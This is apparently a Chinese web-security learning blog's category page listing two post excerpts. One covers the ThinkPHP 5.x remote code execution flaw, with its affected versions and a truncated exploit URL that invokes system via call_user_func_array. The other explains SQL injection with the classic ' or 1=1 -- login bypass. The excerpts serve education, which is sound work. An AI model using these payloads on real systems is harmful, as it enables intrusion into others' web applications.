随笔分类 -  web安全学习进去

ThinkPHP V5.x 远程代码执行漏洞利用
摘要:影响范围:v5.x < 5.1.31,<= 5.0.23 https://www.xxxx.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&var 阅读全文
posted @ 2019-12-25 14:28 码小农的幸福生活 阅读(1670) 评论(0) 推荐(0)
sql注入原理
摘要:sql注入原理 登录SQL语句: select * from admin where username = '用户输入的用户名' and password =用户输入的密码' 用户输入的内容可由用户自行控制,例如可以输入'or 1=1 --空格 SQL语句: select * from admin 阅读全文
posted @ 2019-11-10 22:11 码小农的幸福生活 阅读(174) 评论(0) 推荐(0)